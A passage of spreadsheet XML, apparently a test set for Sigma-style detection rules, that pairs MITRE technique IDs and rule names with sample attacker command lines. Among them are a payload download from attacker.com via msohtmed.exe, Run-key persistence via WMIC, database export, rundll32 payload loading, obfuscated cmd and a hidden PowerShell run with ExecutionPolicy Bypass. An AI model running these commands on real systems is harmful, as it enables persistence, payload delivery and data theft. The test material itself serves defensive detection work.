        <v>0</v>
      </c>
    </row>
    <row r="3977" ht="15.75" customHeight="1" s="42">
      <c r="A3977" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3977" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C3977" s="43" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D3977" s="43" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E3977" s="43" t="inlineStr">
        <is>
          <t>ScriptRunner.exe -appvscript calc.exe</t>
        </is>
      </c>
      <c r="F3977" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3977" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3977" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3977" s="43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J3977" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3977" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3978" ht="15.75" customHeight="1" s="42">
      <c r="A3978" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3978" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C3978" s="43" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D3978" s="43" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E3978" s="43" t="inlineStr">
        <is>
          <t>ScriptRunner.exe /appvscript calc.exe</t>
        </is>
      </c>
      <c r="F3978" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3978" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3978" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3978" s="43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J3978" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3978" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3979" ht="15.75" customHeight="1" s="42">
      <c r="A3979" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3979" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3979" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3979" s="43" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3979" s="43" t="inlineStr">
        <is>
          <t>msohtmed.exe "http://attacker.com/payload.exe"</t>
        </is>
      </c>
      <c r="F3979" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3979" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3979" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3979" s="43" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J3979" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3979" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3980" ht="15.75" customHeight="1" s="42">
      <c r="A3980" s="43" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B3980" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C3980" s="43" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D3980" s="43" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E3980" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "\"updater.exe\"" /f"</t>
        </is>
      </c>
      <c r="F3980" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3980" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3980" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3980" s="43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3980" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3980" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3981" ht="15.75" customHeight="1" s="42">
      <c r="A3981" s="43" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B3981" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C3981" s="43" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D3981" s="43" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E3981" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "\"updater.exe\"" /f"</t>
        </is>
      </c>
      <c r="F3981" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3981" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3981" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3981" s="43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3981" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3981" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3982" ht="15.75" customHeight="1" s="42">
      <c r="A3982" s="43" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B3982" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C3982" s="43" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D3982" s="43" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E3982" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d "\"updater.exe\"" /f"</t>
        </is>
      </c>
      <c r="F3982" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3982" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3982" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3982" s="43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3982" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3982" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3983" ht="15.75" customHeight="1" s="42">
      <c r="A3983" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B3983" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C3983" s="43" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D3983" s="43" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E3983" s="43" t="inlineStr">
        <is>
          <t>bcp  "SELECT * FROM dbo.SecretTable"  queryout  C:\temp\export.txt  -c  -T  -S MYSERVER  -d MyDB</t>
        </is>
      </c>
      <c r="F3983" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3983" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3983" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3983" s="43" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE (c615d676-f655-46b9-b913-78729021e5d7)</t>
        </is>
      </c>
      <c r="J3983" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3983" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3984" ht="15.75" customHeight="1" s="42">
      <c r="A3984" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3984" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3984" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3984" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3984" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe "shell32,Control_RunDLL" payload.dll</t>
        </is>
      </c>
      <c r="F3984" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3984" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3984" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3984" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution (15bd98ea-55f4-4d37-b09a-e7caa0fa2221)</t>
        </is>
      </c>
      <c r="J3984" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3984" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3985" ht="15.75" customHeight="1" s="42">
      <c r="A3985" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3985" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3985" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3985" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3985" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe shell32,Control_RunDLL payload.dll</t>
        </is>
      </c>
      <c r="F3985" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3985" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3985" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3985" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4)</t>
        </is>
      </c>
      <c r="J3985" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3985" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3986" ht="15.75" customHeight="1" s="42">
      <c r="A3986" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3986" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3986" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3986" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3986" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe Control_RunDLL,shell32 payload.dll</t>
        </is>
      </c>
      <c r="F3986" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3986" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3986" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3986" s="43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J3986" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3986" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3987" ht="15.75" customHeight="1" s="42">
      <c r="A3987" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3987" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dosfuscation</t>
        </is>
      </c>
      <c r="C3987" s="43" t="inlineStr">
        <is>
          <t>Potential Dosfuscation Activity</t>
        </is>
      </c>
      <c r="D3987" s="43" t="inlineStr">
        <is>
          <t>a77c1610-fc73-4019-8e29-0f51efc04a51</t>
        </is>
      </c>
      <c r="E3987" s="43" t="inlineStr">
        <is>
          <t>cmd /c "set X=m&amp; set Y=d&amp; c%X%%Y% /c calc.exe"</t>
        </is>
      </c>
      <c r="F3987" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3987" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3987" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3987" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J3987" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3987" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3988" ht="15.75" customHeight="1" s="42">
      <c r="A3988" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3988" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dosfuscation</t>
        </is>
      </c>
      <c r="C3988" s="43" t="inlineStr">
        <is>
          <t>Potential Dosfuscation Activity</t>
        </is>
      </c>
      <c r="D3988" s="43" t="inlineStr">
        <is>
          <t>a77c1610-fc73-4019-8e29-0f51efc04a51</t>
        </is>
      </c>
      <c r="E3988" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "FOR /F \"tokens=1\" %A IN (^'echo set^') DO %A MYVAR=value"</t>
        </is>
      </c>
      <c r="F3988" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3988" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3988" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3988" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J3988" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3988" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3989" ht="15.75" customHeight="1" s="42">
      <c r="A3989" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3989" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C3989" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D3989" s="43" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E3989" s="43" t="inlineStr">
        <is>
          <t>forfiles /p c:\windows\system32 /m notepad.exe -c calc.exe</t>
        </is>
      </c>
      <c r="F3989" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3989" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3989" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3989" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J3989" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3989" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3990" ht="15.75" customHeight="1" s="42">
      <c r="A3990" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3990" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C3990" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D3990" s="43" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E3990" s="43" t="inlineStr">
        <is>
          <t>forfiles /p c:\windows\system32 /m notepad.exe /c^ calc.exe</t>
        </is>
      </c>
      <c r="F3990" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3990" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3990" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3990" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J3990" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3990" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3991" ht="15.75" customHeight="1" s="42">
      <c r="A3991" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3991" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C3991" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D3991" s="43" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E3991" s="43" t="inlineStr">
        <is>
          <t>copy fsutil.exe not_harmful.exe &amp;&amp; not_harmful.exe behavior set SymlinkEvaluation L2L:1 R2R:1</t>
        </is>
      </c>
      <c r="F3991" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3991" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3991" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3991" s="43" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern (42333b2c-b425-441c-b70e-99404a17170f)</t>
        </is>
      </c>
      <c r="J3991" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3991" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3992" ht="15.75" customHeight="1" s="42">
      <c r="A3992" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3992" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3992" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3992" s="43" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3992" s="43" t="inlineStr">
        <is>
          <t>ftp /s:script.txt</t>
        </is>
      </c>
      <c r="F3992" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3992" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3992" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3992" s="43" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution (f426547a-e0f7-441a-b63e-854ac5bdf54d)</t>
        </is>
      </c>
      <c r="J3992" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3992" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3993" ht="15.75" customHeight="1" s="42">
      <c r="A3993" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3993" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3993" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3993" s="43" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3993" s="43" t="inlineStr">
        <is>
          <t>ftp -s script.txt</t>
        </is>
      </c>
      <c r="F3993" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3993" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3993" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3993" s="43" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution (f426547a-e0f7-441a-b63e-854ac5bdf54d)</t>
        </is>
      </c>
      <c r="J3993" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3993" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3994" ht="15.75" customHeight="1" s="42">
      <c r="A3994" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3994" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C3994" s="43" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D3994" s="43" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E3994" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8" `""</t>
        </is>
      </c>
      <c r="F3994" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3994" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3994" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3994" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3994" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3994" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3995" ht="15.75" customHeight="1" s="42">
      <c r="A3995" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3995" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C3995" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D3995" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E3995" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp\</t>
        </is>
      </c>
      <c r="F3995" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3995" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3995" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3995" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J3995" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3995" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3996" ht="15.75" customHeight="1" s="42">
      <c r="A3996" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3996" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3996" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3996" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3996" s="43" t="inlineStr">
        <is>
          <t>php.exe	-r "system('whoami');"</t>
        </is>
      </c>
      <c r="F3996" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3996" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3996" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3996" s="43" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3996" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3996" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3997" ht="15.75" customHeight="1" s="42">
      <c r="A3997" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3997" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3997" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3997" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3997" s="43" t="inlineStr">
        <is>
          <t>php.exe -R "system('whoami');"</t>
        </is>
      </c>
      <c r="F3997" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3997" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3997" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3997" s="43" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3997" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3997" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3998" ht="15.75" customHeight="1" s="42">
      <c r="A3998" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3998" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3998" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3998" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3998" s="43" t="inlineStr">
        <is>
          <t>php.exe -r system('whoami');</t>
        </is>
      </c>
      <c r="F3998" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3998" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3998" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3998" s="43" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3998" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3998" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3999" ht="15.75" customHeight="1" s="42">
      <c r="A3999" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3999" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3999" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3999" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3999" s="43" t="inlineStr">
        <is>
          <t>php.exe -r "system(\'whoami\');"</t>
        </is>
      </c>
      <c r="F3999" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3999" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3999" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3999" s="43" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3999" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3999" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4000" ht="15.75" customHeight="1" s="42">
      <c r="A4000" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4000" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4000" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4000" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4000" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {Set-Service -Name 'Spooler' -StartupType 'Disabled'}"</t>
        </is>
      </c>
      <c r="F4000" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4000" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4000" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4000" s="43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4000" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4000" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4001" ht="15.75" customHeight="1" s="42">
      <c r="A4001" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4001" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4001" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4001" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4001" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType Manual"</t>
        </is>
      </c>
      <c r="F4001" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4001" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4001" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4001" s="43" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel (023c654f-8f16-44d9-bb2b-00ff36a62af9)</t>
        </is>
      </c>
      <c r="J4001" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4001" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4002" ht="15.75" customHeight="1" s="42">
      <c r="A4002" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4002" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4002" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4002" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4002" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'Spooler' -StartupType 'Disabled'"</t>
        </is>
